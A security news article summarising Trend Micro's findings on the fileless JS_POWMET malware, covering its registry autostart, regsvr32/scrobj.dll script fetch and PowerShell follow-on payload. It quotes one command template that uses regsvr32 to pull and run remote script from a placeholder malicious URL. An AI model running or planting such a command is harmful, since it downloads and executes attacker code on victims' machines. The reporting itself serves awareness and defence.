Friday, April 19, 2024

A Complete Fileless Malware “JS_POWMET” with Highly Sophisticated Evasion Technique

Hackers are Distributing Advanced Fileless Malware with Evasion capabilities that lead very Difficult to Detect With a different kind of Advance Attacking Capabilities and Methods.

A Complete Fileless Malware was Detected as “JS_POWMET” that capable to evade the Security Control such as AV While Enter into the Target Machine with Fileless capability.

It will eventually reveal themselves when they execute their payload in the specific Target computer.

This Malware Spreading through an autostart registry procedure that hides the entry point of this Fileless malware.

This Highly complex and Obfuscated Fileless malware gives more pain to analyze through sandbox and also very difficult to examine by Malware Researchers.

According to Trend Micro Report JS_POWMET affecting APAC the most, with almost 90% of the infections coming from the region.

Also Read A Fileless Malware Called “ATMitch” Attack The ATM machines Remotely and Delete The Attack Evidence

Infection Chain

Initially, This Fileless Malware “JS_POWMET” arrives using Autostart registry entry point to the victim’s Machine.

This Malware usually Downloaded by a user from malicious Website and other fact is that File can be Dropped by other Malware.

Once “JS_POWMET” file Dropped into the victim’s machine then it will download TROJ_PSINJECT file and Execute it.

This Executed file contains Powershell script that runs under the process of Powershell.

In this point, Trend Micro researchers said, the registry has already been changed by the time it is downloaded into the system.

COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”

A parameter called regsvr32 get the Malicious URL that has capable of fetching a file that contains XML with malicious JavaScript.

This regsvr32 will become capable of executing arbitrary scripts without saving the XML file on the machine/system.

Finally, it will automatically Download the Malicious file from Command & Control server whenever infected machine starts up.

One of the more effective methods for mitigating the effects of Fileless malware would be to limit access to critical infrastructure via container-based systems that separate endpoints from the most important parts of the network. Trend Micro said.


Latest articles

Alert! Windows LPE Zero-day Exploit Advertised on Hacker Forums

A new zero-day Local Privilege Escalation (LPE) exploit has been put up for sale...

Palo Alto ZeroDay Exploited in The Wild Following PoC Release

Palo Alto Networks has disclosed a critical vulnerability within its PAN-OS operating system, identified...

FIN7 Hackers Attacking IT Employees Of Automotive Industry

IT employees in the automotive industry are often targeted by hackers because they have...

Russian APT44 – The Most Notorious Cyber Sabotage Group Globally

As Russia's invasion of Ukraine enters its third year, the formidable Sandworm (aka FROZENBARENTS,...

SoumniBot Exploiting Android Manifest Flaws to Evade Detection

A new banker, SoumniBot, has recently been identified. It targets Korean users and is...

LeSlipFrancais Data Breach: Customers’ Personal Information Exposed

LeSlipFrancais, the renowned French underwear brand, has confirmed a data breach impacting its customer...

Cisco Hypershield: AI-Powered Hyper-Distributed Security for Data Center

Cisco has unveiled its latest innovation, Cisco Hypershield, marking a milestone in cybersecurity.This groundbreaking...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.


Mastering WAAP/WAF ROI Analysis

As the importance of compliance and safeguarding critical websites and APIs grows, Web Application and API Protection (WAAP) solutions play an integral role.
Key takeaways include:

  • Pricing models
  • Cost Estimation
  • ROI Calculation

Related Articles